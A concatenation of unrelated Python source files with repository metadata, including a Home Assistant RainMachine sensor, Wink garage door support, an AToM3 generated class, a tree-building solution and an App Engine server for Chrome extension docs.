] | null | null | null | homeassistant/components/rainmachine/binary_sensor.py | dnguyen800/home-assistant | 353a0144960dcb7c4f6b81459f76937ce078c1a8 | [
"Apache-2.0"
] | null | null | null | homeassistant/components/rainmachine/binary_sensor.py | dnguyen800/home-assistant | 353a0144960dcb7c4f6b81459f76937ce078c1a8 | [
"Apache-2.0"
] | null | null | null | """This platform provides binary sensors for key RainMachine data."""
import logging
from homeassistant.components.binary_sensor import BinarySensorDevice
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from . import (
DATA_CLIENT,
DOMAIN as RAINMACHINE_DOMAIN,
PROVISION_SETTINGS,
RESTRICTIONS_CURRENT,
RESTRICTIONS_UNIVERSAL,
SENSOR_UPDATE_TOPIC,
RainMachineEntity,
)
_LOGGER = logging.getLogger(__name__)
TYPE_FLOW_SENSOR = "flow_sensor"
TYPE_FREEZE = "freeze"
TYPE_FREEZE_PROTECTION = "freeze_protection"
TYPE_HOT_DAYS = "extra_water_on_hot_days"
TYPE_HOURLY = "hourly"
TYPE_MONTH = "month"
TYPE_RAINDELAY = "raindelay"
TYPE_RAINSENSOR = "rainsensor"
TYPE_WEEKDAY = "weekday"
BINARY_SENSORS = {
TYPE_FLOW_SENSOR: ("Flow Sensor", "mdi:water-pump", True, PROVISION_SETTINGS),
TYPE_FREEZE: ("Freeze Restrictions", "mdi:cancel", True, RESTRICTIONS_CURRENT),
TYPE_FREEZE_PROTECTION: (
"Freeze Protection",
"mdi:weather-snowy",
True,
RESTRICTIONS_UNIVERSAL,
),
TYPE_HOT_DAYS: (
"Extra Water on Hot Days",
"mdi:thermometer-lines",
True,
RESTRICTIONS_UNIVERSAL,
),
TYPE_HOURLY: ("Hourly Restrictions", "mdi:cancel", False, RESTRICTIONS_CURRENT),
TYPE_MONTH: ("Month Restrictions", "mdi:cancel", False, RESTRICTIONS_CURRENT),
TYPE_RAINDELAY: (
"Rain Delay Restrictions",
"mdi:cancel",
False,
RESTRICTIONS_CURRENT,
),
TYPE_RAINSENSOR: (
"Rain Sensor Restrictions",
"mdi:cancel",
False,
RESTRICTIONS_CURRENT,
),
TYPE_WEEKDAY: ("Weekday Restrictions", "mdi:cancel", False, RESTRICTIONS_CURRENT),
}
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up RainMachine binary sensors based on a config entry."""
rainmachine = hass.data[RAINMACHINE_DOMAIN][DATA_CLIENT][entry.entry_id]
async_add_entities(
[
RainMachineBinarySensor(
rainmachine, sensor_type, name, icon, enabled_by_default, api_category
)
for (
sensor_type,
(name, icon, enabled_by_default, api_category),
) in BINARY_SENSORS.items()
],
)
class RainMachineBinarySensor(RainMachineEntity, BinarySensorDevice):
"""A sensor implementation for raincloud device."""
def __init__(
self, rainmachine, sensor_type, name, icon, enabled_by_default, api_category
):
"""Initialize the sensor."""
super().__init__(rainmachine)
self._api_category = api_category
self._enabled_by_default = enabled_by_default
self._icon = icon
self._name = name
self._sensor_type = sensor_type
self._state = None
@property
def entity_registry_enabled_default(self):
"""Determine whether an entity is enabled by default."""
return self._enabled_by_default
@property
def icon(self) -> str:
"""Return the icon."""
return self._icon
@property
def is_on(self):
"""Return the status of the sensor."""
return self._state
@property
def should_poll(self):
"""Disable polling."""
return False
@property
def unique_id(self) -> str:
"""Return a unique, Home Assistant friendly identifier for this entity."""
return "{0}_{1}".format(
self.rainmachine.device_mac.replace(":", ""), self._sensor_type
)
async def async_added_to_hass(self):
"""Register callbacks."""
@callback
def update():
"""Update the state."""
self.async_schedule_update_ha_state(True)
self._dispatcher_handlers.append(
async_dispatcher_connect(self.hass, SENSOR_UPDATE_TOPIC, update)
)
await self.rainmachine.async_register_api_interest(self._api_category)
await self.async_update()
async def async_update(self):
"""Update the state."""
if self._sensor_type == TYPE_FLOW_SENSOR:
self._state = self.rainmachine.data[PROVISION_SETTINGS]["system"].get(
"useFlowSensor"
)
elif self._sensor_type == TYPE_FREEZE:
self._state = self.rainmachine.data[RESTRICTIONS_CURRENT]["freeze"]
elif self._sensor_type == TYPE_FREEZE_PROTECTION:
self._state = self.rainmachine.data[RESTRICTIONS_UNIVERSAL][
"freezeProtectEnabled"
]
elif self._sensor_type == TYPE_HOT_DAYS:
self._state = self.rainmachine.data[RESTRICTIONS_UNIVERSAL][
"hotDaysExtraWatering"
]
elif self._sensor_type == TYPE_HOURLY:
self._state = self.rainmachine.data[RESTRICTIONS_CURRENT]["hourly"]
elif self._sensor_type == TYPE_MONTH:
self._state = self.rainmachine.data[RESTRICTIONS_CURRENT]["month"]
elif self._sensor_type == TYPE_RAINDELAY:
self._state = self.rainmachine.data[RESTRICTIONS_CURRENT]["rainDelay"]
elif self._sensor_type == TYPE_RAINSENSOR:
self._state = self.rainmachine.data[RESTRICTIONS_CURRENT]["rainSensor"]
elif self._sensor_type == TYPE_WEEKDAY:
self._state = self.rainmachine.data[RESTRICTIONS_CURRENT]["weekDay"]
async def async_will_remove_from_hass(self):
"""Disconnect dispatcher listeners and deregister API interest."""
super().async_will_remove_from_hass()
self.rainmachine.async_deregister_api_interest(self._api_category)
| 33.778443 | 86 | 0.660167 |
ace97861287160181302dbd1d69c68aa88557b77 | 10,964 | py | Python | UMLRT2Kiltera_MM/MT_pre__Capsule.py | levilucio/SyVOLT | 7526ec794d21565e3efcc925a7b08ae8db27d46a | [
"MIT"
] | 3 | 2017-06-02T19:26:27.000Z | 2021-06-14T04:25:45.000Z | UMLRT2Kiltera_MM/MT_pre__Capsule.py | levilucio/SyVOLT | 7526ec794d21565e3efcc925a7b08ae8db27d46a | [
"MIT"
] | 8 | 2016-08-24T07:04:07.000Z | 2017-05-26T16:22:47.000Z | UMLRT2Kiltera_MM/MT_pre__Capsule.py | levilucio/SyVOLT | 7526ec794d21565e3efcc925a7b08ae8db27d46a | [
"MIT"
] | 1 | 2019-10-31T06:00:23.000Z | 2019-10-31T06:00:23.000Z | """
__MT_pre__Capsule.py_____________________________________________________
Automatically generated AToM3 syntactic object (DO NOT MODIFY DIRECTLY)
Author: gehan
Modified: Sun Feb 15 10:22:14 2015
_________________________________________________________________________
"""
from ASGNode import *
from ATOM3Type import *
from ATOM3Text import *
from ATOM3String import *
from ATOM3Boolean import *
from graph_MT_pre__Capsule import *
class MT_pre__Capsule(ASGNode, ATOM3Type):
def __init__(self, parent = None):
ASGNode.__init__(self)
ATOM3Type.__init__(self)
self.superTypes = ['MT_pre__NamedElement', 'MT_pre__MetaModelElement_S']
self.graphClass_ = graph_MT_pre__Capsule
self.isGraphObjectVisual = True
if(hasattr(self, '_setHierarchicalLink')):
self._setHierarchicalLink(False)
if(hasattr(self, '_setHierarchicalNode')):
self._setHierarchicalNode(False)
self.parent = parent
self.MT_pre__cardinality=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
self.MT_pre__cardinality=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
self.MT_pre__cardinality=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
self.MT_pre__classtype=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
self.MT_pre__classtype=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
self.MT_pre__classtype=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
self.MT_pre__name=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
self.MT_pre__name=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
self.MT_pre__name=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
self.MT_label__=ATOM3String('', 20)
self.MT_pivotOut__=ATOM3String('', 20)
self.MT_pivotIn__=ATOM3String('', 20)
self.MT_subtypeMatching__=ATOM3Boolean()
self.MT_subtypeMatching__.setValue(('True', 0))
self.MT_subtypeMatching__.config = 0
self.generatedAttributes = {'MT_pre__cardinality': ('ATOM3Text', ),
'MT_pre__cardinality': ('ATOM3Text', ),
'MT_pre__cardinality': ('ATOM3Text', ),
'MT_pre__classtype': ('ATOM3Text', ),
'MT_pre__classtype': ('ATOM3Text', ),
'MT_pre__classtype': ('ATOM3Text', ),
'MT_pre__name': ('ATOM3Text', ),
'MT_pre__name': ('ATOM3Text', ),
'MT_pre__name': ('ATOM3Text', ),
'MT_label__': ('ATOM3String', ),
'MT_pivotOut__': ('ATOM3String', ),
'MT_pivotIn__': ('ATOM3String', ),
'MT_subtypeMatching__': ('ATOM3Boolean', ) }
self.realOrder = ['MT_pre__cardinality','MT_pre__cardinality','MT_pre__cardinality','MT_pre__classtype','MT_pre__classtype','MT_pre__classtype','MT_pre__name','MT_pre__name','MT_pre__name','MT_label__','MT_pivotOut__','MT_pivotIn__','MT_subtypeMatching__']
self.directEditing = [0,0,0,0,0,0,0,0,0,1,1,1,1]
def clone(self):
cloneObject = MT_pre__Capsule( self.parent )
for atr in self.realOrder:
cloneObject.setAttrValue(atr, self.getAttrValue(atr).clone() )
ASGNode.cloneActions(self, cloneObject)
return cloneObject
def copy(self, other):
ATOM3Type.copy(self, other)
for atr in self.realOrder:
self.setAttrValue(atr, other.getAttrValue(atr) )
ASGNode.copy(self, other)
def preCondition (self, actionID, * params):
if self.graphObject_:
return self.graphObject_.preCondition(actionID, params)
else: return None
def postCondition (self, actionID, * params):
if self.graphObject_:
return self.graphObject_.postCondition(actionID, params)
else: return None
def preAction (self, actionID, * params):
if actionID == self.CREATE:
self.autoIncrLabel(params)
if self.graphObject_:
return self.graphObject_.preAction(actionID, params)
else: return None
def postAction (self, actionID, * params):
if self.graphObject_:
return self.graphObject_.postAction(actionID, params)
else: return None
def QOCA(self, params):
"""
QOCA Constraint Template
NOTE: DO NOT select a POST/PRE action trigger
Constraints will be added/removed in a logical manner by other mechanisms.
"""
return # <---- Remove this to use QOCA
""" Get the high level constraint helper and solver """
from Qoca.atom3constraints.OffsetConstraints import OffsetConstraints
oc = OffsetConstraints(self.parent.qocaSolver)
"""
Example constraint, see Kernel/QOCA/atom3constraints/OffsetConstraints.py
For more types of constraints
"""
oc.fixedWidth(self.graphObject_, self.graphObject_.sizeX)
oc.fixedHeight(self.graphObject_, self.graphObject_.sizeY)
def autoIncrLabel(self, params):
#===============================================================================
# Auto increment the label
#===============================================================================
# If there is already one, ignore
if not self.MT_label__.isNone(): return
# Get the maximum label of all MT_pre__ elements
label = 0
for nt in self.parent.ASGroot.listNodes:
if nt.startswith('MT_pre__'):
for node in self.parent.ASGroot.listNodes[nt]:
currLabel = 0
try:
currLabel = int(node.MT_label__.getValue())
except:
pass
if currLabel > label:
label = currLabel
# The label of this instance will be the max label + 1
self.MT_label__.setValue(str(label + 1))
| 78.877698 | 630 | 0.58008 |
ace97898abaed617c2c8ea00cbb3a39f556e1677 | 1,219 | py | Python | server/src/project_n/app/game/gatenodeapp/arean.py | isuhao/gamein9miao | df8624b0e3223a12eb1dc833ce8fa89fd715aa5b | [
"MIT"
] | 1 | 2018-04-18T02:38:14.000Z | 2018-04-18T02:38:14.000Z | server/src/project_n/app/game/gatenodeapp/arean.py | isuhao/gamein9miao | df8624b0e3223a12eb1dc833ce8fa89fd715aa5b | [
"MIT"
] | null | null | null | server/src/project_n/app/game/gatenodeapp/arean.py | isuhao/gamein9miao | df8624b0e3223a12eb1dc833ce8fa89fd715aa5b | [
"MIT"
] | null | null | null | #coding:utf8
'''
Created on 2013-10-25
@author: lan (www.9miao.com)
'''
from app.game.gatenodeservice import remoteserviceHandle
from app.game.appinterface import arena
import json
@remoteserviceHandle
def GetJingJiInfo_3700(dynamicId, request_proto):
'''获取竞技场信息
'''
argument = json.loads(request_proto)
characterId = argument.get('characterId')
data = arena.GetJingJiInfo3700(dynamicId, characterId)
return json.dumps(data)
@remoteserviceHandle
def ArenaBattle_3704(dynamicId, request_proto):
'''竞技场战斗
'''
argument = json.loads(request_proto)
characterId = argument.get('characterId')
tocharacterId = argument.get('tid')
data = arena.ArenaBattle_3704(dynamicId, characterId, tocharacterId)
response = {}
response['result'] = data.get('result',False)
response['message'] = data.get('message','')
_responsedata = data.get('data')
if _responsedata:
battle = _responsedata.get('fight')
setData = _responsedata.get('setData')
fightdata = battle.formatFightData()
response['data'] = fightdata
fightdata['battleResult'] = battle.battleResult
fightdata['setData'] = setData
return json.dumps(response)
| 29.731707 | 72 | 0.699754 |
ace97b5fba93fd62681f086cd6719ff3ecc43e56 | 2,314 | py | Python | homeassistant/components/garage_door/wink.py | magas0/home-assistant | 3c9e4934946ce99f5193ca550296034e86337997 | [
"MIT"
] | 1 | 2016-07-14T05:20:54.000Z | 2016-07-14T05:20:54.000Z | app/bower_components/home-assistant-dev/homeassistant/components/garage_door/wink.py | EkoHub/CustomizableWalkThroughTourElement | 0a4ae793a1e031c9bd042b0e8ffef3be96b7c1b0 | [
"BSD-3-Clause"
] | null | null | null | app/bower_components/home-assistant-dev/homeassistant/components/garage_door/wink.py | EkoHub/CustomizableWalkThroughTourElement | 0a4ae793a1e031c9bd042b0e8ffef3be96b7c1b0 | [
"BSD-3-Clause"
] | null | null | null | """
Support for Wink garage doors.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/garage_door.wink/
"""
import logging
from homeassistant.components.garage_door import GarageDoorDevice
from homeassistant.const import CONF_ACCESS_TOKEN, ATTR_BATTERY_LEVEL
REQUIREMENTS = ['python-wink==0.7.6']
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup the Wink garage door platform."""
import pywink
if discovery_info is None:
token = config.get(CONF_ACCESS_TOKEN)
if token is None:
logging.getLogger(__name__).error(
"Missing wink access_token. "
"Get one at https://winkbearertoken.appspot.com/")
return
pywink.set_bearer_token(token)
add_devices(WinkGarageDoorDevice(door) for door in
pywink.get_garage_doors())
class WinkGarageDoorDevice(GarageDoorDevice):
"""Representation of a Wink garage door."""
def __init__(self, wink):
"""Initialize the garage door."""
self.wink = wink
self._battery = self.wink.battery_level
@property
def unique_id(self):
"""Return the ID of this wink garage door."""
return "{}.{}".format(self.__class__, self.wink.device_id())
@property
def name(self):
"""Return the name of the garage door if any."""
return self.wink.name()
def update(self):
"""Update the state of the garage door."""
self.wink.update_state()
@property
def is_closed(self):
"""Return true if door is closed."""
return self.wink.state() == 0
@property
def available(self):
"""True if connection == True."""
return self.wink.available
def close_door(self):
"""Close the door."""
self.wink.set_state(0)
def open_door(self):
"""Open the door."""
self.wink.set_state(1)
@property
def device_state_attributes(self):
"""Return the state attributes."""
if self._battery:
return {
ATTR_BATTERY_LEVEL: self._battery_level,
}
@property
def _battery_level(self):
"""Return the battery level."""
return self.wink.battery_level * 100
| 26.906977 | 74 | 0.63051 |
ace97b6e48c3d8d7d2c00a7b0f8ab144037a01ee | 611 | py | Python | June 2021/Construct Binary Tree from Preorder and Inorder Traversal.py | parikshitgupta1/leetcode | eba6c11740dc7597204af127c0f4c2163376294f | [
"MIT"
] | null | null | null | June 2021/Construct Binary Tree from Preorder and Inorder Traversal.py | parikshitgupta1/leetcode | eba6c11740dc7597204af127c0f4c2163376294f | [
"MIT"
] | null | null | null | June 2021/Construct Binary Tree from Preorder and Inorder Traversal.py | parikshitgupta1/leetcode | eba6c11740dc7597204af127c0f4c2163376294f | [
"MIT"
] | null | null | null | class Solution:
"""
@param preorder : A list of integers that preorder traversal of a tree
@param inorder : A list of integers that inorder traversal of a tree
@return : Root of a tree
"""
def buildTree(self, preorder, inorder):
# write your code here
if not inorder: return None # inorder is empty
root = TreeNode(preorder[0])
rootPos = inorder.index(preorder[0])
root.left = self.buildTree(preorder[1 : 1 + rootPos], inorder[ : rootPos])
root.right = self.buildTree(preorder[rootPos + 1 : ], inorder[rootPos + 1 : ])
return root
| 40.733333 | 86 | 0.635025 |
ace97d765c5eb5f6a40e2cc39bf59b8210a306c9 | 523 | py | Python | test/data/testcase/browser/browser_01.py | TE-ToshiakiTanaka/stve | 30b1a0c9b8b20f7059999b0b25b16d6b43aa935c | [
"MIT"
] | null | null | null | test/data/testcase/browser/browser_01.py | TE-ToshiakiTanaka/stve | 30b1a0c9b8b20f7059999b0b25b16d6b43aa935c | [
"MIT"
] | null | null | null | test/data/testcase/browser/browser_01.py | TE-ToshiakiTanaka/stve | 30b1a0c9b8b20f7059999b0b25b16d6b43aa935c | [
"MIT"
] | null | null | null | import os
import sys
import time
from stve.log import LOG as L
from stve.script import StveTestCase
class TestCase(StveTestCase):
def __init__(self, *args, **kwargs):
super(TestCase, self).__init__(*args, **kwargs)
@classmethod
def setUpClass(cls):
L.info("*** Start TestCase : %s *** " % __file__)
def test(self):
self.assertTrue("stve.browser" in self.service.keys())
@classmethod
def tearDownClass(cls):
L.info("*** End TestCase : %s *** " % __file__)
| 22.73913 | 62 | 0.629063 |
ace97dc56b55271acedbdb277a2927860eed0cc7 | 1,677 | py | Python | api/transform.py | wysockipiotr/deep-scanner | d80799a3790d51a90374b8904aebc8e12a1e783e | [
"MIT"
] | 12 | 2019-12-06T12:18:01.000Z | 2021-12-27T04:47:38.000Z | api/transform.py | wysockipiotr/deep-scanner | d80799a3790d51a90374b8904aebc8e12a1e783e | [
"MIT"
] | 4 | 2020-11-13T18:33:36.000Z | 2022-02-10T00:36:55.000Z | api/transform.py | wysockipiotr/deep-scanner | d80799a3790d51a90374b8904aebc8e12a1e783e | [
"MIT"
] | 3 | 2020-09-27T01:43:54.000Z | 2021-07-01T18:01:19.000Z | import numpy as np
import cv2
def distance(a, b):
"""
Euclidean distance between points `a` and `b`.
"""
d = a - b
return np.sqrt(d @ d)
def clockwise_sorted(points: np.ndarray) -> np.ndarray:
"""
Sort 4 (two-dimensional) points in the following order:
1. top left
2. top right
3. bottom right
4. bottom left
"""
assert points.shape[0] == 4, "Four points are required"
def sorted_by_column(array: np.ndarray, column_index: int):
return array[array[:, column_index].argsort()]
y_sorted = sorted_by_column(points, column_index=1)
tl, tr = sorted_by_column(y_sorted[:2], column_index=0)
bl, br = sorted_by_column(y_sorted[2:], column_index=0)
return np.array([tl, tr, br, bl], dtype=np.float32)
def four_point_warp(image: np.ndarray, contour_points: np.ndarray) -> np.ndarray:
"""
Returns the `image` with warped perspective, in accordance with the given 4-point contour.
"""
# contour_points = clockwise_sorted(contour_points)
tl, tr, br, bl = contour_points
top_width, bottom_width = distance(tl, tr), distance(bl, br)
max_width = int(max(top_width, bottom_width))
left_height, right_height = distance(tl, bl), distance(tr, br)
max_height = int(max(left_height, right_height))
new_contour_points = np.array(
[
[0, 0],
[max_width - 1, 0],
[max_width - 1, max_height - 1],
[0, max_height - 1],
],
dtype=np.float32,
)
warp_matrix = cv2.getPerspectiveTransform(contour_points, new_contour_points)
return cv2.warpPerspective(image, warp_matrix, (max_width, max_height))
| 31.055556 | 94 | 0.646392 |
ace97f28f0742202e76159325ad31a2b84562b96 | 14,975 | py | Python | chrome/common/extensions/docs/server/chromeextensionsdocs.py | Scopetta197/chromium | b7bf8e39baadfd9089de2ebdc0c5d982de4a9820 | [
"BSD-3-Clause"
] | 212 | 2015-01-31T11:55:58.000Z | 2022-02-22T06:35:11.000Z | chrome/common/extensions/docs/server/chromeextensionsdocs.py | 1065672644894730302/Chromium | 239dd49e906be4909e293d8991e998c9816eaa35 | [
"BSD-3-Clause"
] | 5 | 2015-03-27T14:29:23.000Z | 2019-09-25T13:23:12.000Z | chrome/common/extensions/docs/server/chromeextensionsdocs.py | 1065672644894730302/Chromium | 239dd49e906be4909e293d8991e998c9816eaa35 | [
"BSD-3-Clause"
] | 221 | 2015-01-07T06:21:24.000Z | 2022-02-11T02:51:12.000Z | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import cgi
import logging
import re
import os
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.api import memcache
from google.appengine.api import urlfetch
# TODO(nickbaum): unit tests
# TODO(nickbaum): is this the right way to do constants?
class Channel():
def __init__(self, name, tag):
self.name = name
self.tag = tag
# TODO(nickbaum): unit test this
def matchPath(self, path):
match = "/" + self.name + "/"
if path[0:len(match)] == match:
return true
else:
return false
Channel.DEV = Channel("dev", "2.0-dev")
Channel.BETA = Channel("beta", "1.1-beta")
Channel.STABLE = Channel("stable", "")
Channel.CHANNELS = [Channel.DEV, Channel.BETA, Channel.STABLE]
Channel.TRUNK = Channel("trunk", "")
Channel.DEFAULT = Channel.STABLE
DEFAULT_CACHE_TIME = 300
class MainPage(webapp.RequestHandler):
# get page from memcache, or else fetch it from src
def get(self):
path = os.path.realpath(os.path.join('/', self.request.path))
# special path to invoke the unit tests
# TODO(nickbaum): is there a less ghetto way to invoke the unit test?
if path == "/test":
self.unitTest()
return
# if root, redirect to index.html
# TODO(nickbaum): this doesn't handle /chrome/extensions/trunk, etc
if (path == "/chrome/extensions") or (path == "chrome/extensions/"):
self.redirect("/chrome/extensions/index.html")
return
# else remove prefix
if(path[:18] == "/chrome/extensions"):
path = path[18:]
# TODO(nickbaum): there's a subtle bug here: if there are two instances of the app,
# their default caches will override each other. This is bad!
result = memcache.get(path)
if result is None:
logging.info("Cache miss: " + path)
url = self.getSrcUrl(path)
if (url[1] is not Channel.TRUNK) and (url[0] != "http://src.chromium.org/favicon.ico"):
branch = self.getBranch(url[1])
url = url[0] % branch
else:
url = url[0]
logging.info("Path: " + self.request.path)
logging.info("Url: " + url)
try:
result = urlfetch.fetch(url)
if result.status_code != 200:
logging.error("urlfetch failed: " + url)
# TODO(nickbaum): what should we do when the urlfetch fails?
# Files inside of samples should be rendered with content-type
# text/plain so that their source is visible when linked to. The only
# types we should serve as-is are images.
if ((path.startswith("/examples") or
path.startswith("/stable/examples") or
path.startswith("/beta/examples") or
path.startswith("/dev/examples") or
path.startswith("/trunk/examples")) and
not (result.headers['content-type'].startswith('image/') or
result.headers['Content-Type'].startswith('image/'))):
result.headers['content-type'] = 'text/plain'
except:
logging.error("urlfetch failed: " + url)
# TODO(nickbaum): what should we do when the urlfetch fails?
try:
if not memcache.add(path, result, DEFAULT_CACHE_TIME):
logging.error("Memcache set failed.")
except:
logging.error("Memcache set failed.")
for key in result.headers:
self.response.headers[key] = result.headers[key]
self.response.out.write(result.content)
def head(self):
self.get()
# get the src url corresponding to the request
# returns a tuple of the url and the branch
# this function is the only part that is unit tested
def getSrcUrl(self, path):
# from the path they provided, figure out which channel they requested
# TODO(nickbaum) clean this logic up
# find the first subdirectory of the path
path = path.split('/', 2)
url = "http://src.chromium.org/viewvc/chrome/"
channel = None
# if there's no subdirectory, choose the default channel
# otherwise, figure out if the subdirectory corresponds to a channel
if len(path) == 2:
path.append("")
if path[1] == "":
channel = Channel.DEFAULT
if(Channel.DEFAULT == Channel.TRUNK):
url = url + "trunk/src/chrome/"
else:
url = url + "branches/%s/src/chrome/"
path = ""
elif path[1] == Channel.TRUNK.name:
url = url + "trunk/src/chrome/"
channel = Channel.TRUNK
path = path[2]
else:
# otherwise, run through the different channel options
for c in Channel.CHANNELS:
if(path[1] == c.name):
channel = c
url = url + "branches/%s/src/chrome/"
path = path[2]
break
# if the subdirectory doesn't correspond to a channel, use the default
if channel is None:
channel = Channel.DEFAULT
if(Channel.DEFAULT == Channel.TRUNK):
url = url + "trunk/src/chrome/"
else:
url = url + "branches/%s/src/chrome/"
if path[2] != "":
path = path[1] + "/" + path[2]
else:
path = path[1]
# special cases
# TODO(nickbaum): this is super cumbersome to maintain
if path == "third_party/jstemplate/jstemplate_compiled.js":
url = url + path
elif path.startswith("api/") and path.endswith(".json"):
url = url + "common/extensions/" + path
elif path == "favicon.ico":
url = "http://src.chromium.org/favicon.ico"
else:
if path == "":
path = "index.html"
url = url + "common/extensions/docs/" + path
return [url, channel]
# get the current version number for the channel requested (dev, beta or stable)
# TODO(nickbaum): move to Channel object
def getBranch(self, channel):
branch = memcache.get(channel.name)
if branch is None:
# query Omaha to figure out which version corresponds to this channel
postdata = """<?xml version="1.0" encoding="UTF-8"?>
<o:gupdate xmlns:o="http://www.google.com/update2/request" protocol="2.0" testsource="crxdocs">
<o:app appid="{8A69D345-D564-463C-AFF1-A69D9E530F96}" version="0.0.0.0" lang="">
<o:updatecheck tag="%s" installsource="ondemandcheckforupdates" />
</o:app>
</o:gupdate>
""" % channel.tag
result = urlfetch.fetch(url="https://tools.google.com/service/update2",
payload=postdata,
method=urlfetch.POST,
headers={'Content-Type': 'application/x-www-form-urlencoded',
'X-USER-IP': '72.1.1.1'})
if result.status_code != 200:
logging.error("urlfetch failed.")
# TODO(nickbaum): what should we do when the urlfetch fails?
# find branch in response
match = re.search(r'<updatecheck Version="\d+\.\d+\.(\d+)\.\d+"', result.content)
if match is None:
logging.error("Version number not found: " + result.content)
#TODO(nickbaum): should we fall back on trunk in this case?
branch = match.group(1)
# TODO(nickbaum): make cache time a constant
if not memcache.add(channel.name, branch, DEFAULT_CACHE_TIME):
logging.error("Memcache set failed.")
return branch
# TODO(nickbaum): is there a more elegant way to write this unit test?
# I deliberately kept it dumb to avoid errors sneaking in, but it's so verbose...
# TODO(nickbaum): should I break this up into multiple files?
def unitTest(self):
self.response.out.write("Testing TRUNK<br/>")
self.check("/trunk/", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/docs/index.html", Channel.TRUNK)
self.check("/trunk/index.html", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/docs/index.html", Channel.TRUNK)
self.check("/trunk/getstarted.html", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/docs/getstarted.html", Channel.TRUNK)
self.response.out.write("<br/>Testing DEV<br/>")
self.check("/dev/", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/index.html", Channel.DEV)
self.check("/dev/index.html", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/index.html", Channel.DEV)
self.check("/dev/getstarted.html", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/getstarted.html", Channel.DEV)
self.response.out.write("<br/>Testing BETA<br/>")
self.check("/beta/", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/index.html", Channel.BETA)
self.check("/beta/index.html", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/index.html", Channel.BETA)
self.check("/beta/getstarted.html", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/getstarted.html", Channel.BETA)
self.response.out.write("<br/>Testing STABLE<br/>")
self.check("/stable/", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/index.html", Channel.STABLE)
self.check("/stable/index.html", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/index.html", Channel.STABLE)
self.check("/stable/getstarted.html", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/getstarted.html", Channel.STABLE)
self.response.out.write("<br/>Testing jstemplate_compiled.js<br/>")
self.check("/trunk/third_party/jstemplate/jstemplate_compiled.js", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/third_party/jstemplate/jstemplate_compiled.js", Channel.TRUNK)
